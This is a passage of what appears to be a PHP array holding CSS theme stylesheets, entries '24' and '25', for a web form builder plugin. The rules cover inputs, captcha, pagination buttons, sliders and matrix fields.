!important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#46BBDE;\r\nborder:1px solid #FFFFFF;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#46BBDE;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius: 0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#46BBDE;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "24" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px ;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#46BBDE !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#F79647 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #46BBDE !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #46BBDE !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#46BBDE !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F79647 !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder-radius: 0px !important;\nbox-shadow: 2px 2px 4px 0px #F79647 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nbackground-color:#fff !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#46BBDE !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#5EA3CC;\r\nborder:1px solid #FFFFFF;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#5EA3CC;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#5EA3CC;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "25" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 6px solid #fff !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#E7E7E7 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\nborder:1px solid #4AB9F1 !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#4AB9F1 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#999 !important;\nfont-style:italic !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #E7E7E7 !important;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #E7E7E7 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nborder: 1px solid #999 !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#E7E7E7 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #999 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#5EA3CC !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #E7E7E7 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E7E7E7 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nspan.wdform_page_button\n{\ncolor:#5EA3CC !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.wdform_page_navigation\n{\nmargin-left: 6px !important;\nmargin-right: 4px !important;\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#C91B24;\r\nborder:1px solid #FFFFFF;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#C91B24;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#E7E7E7;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#C91B24;\r\nborder:none;\r\nmargin:5px 7px;\r\n\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
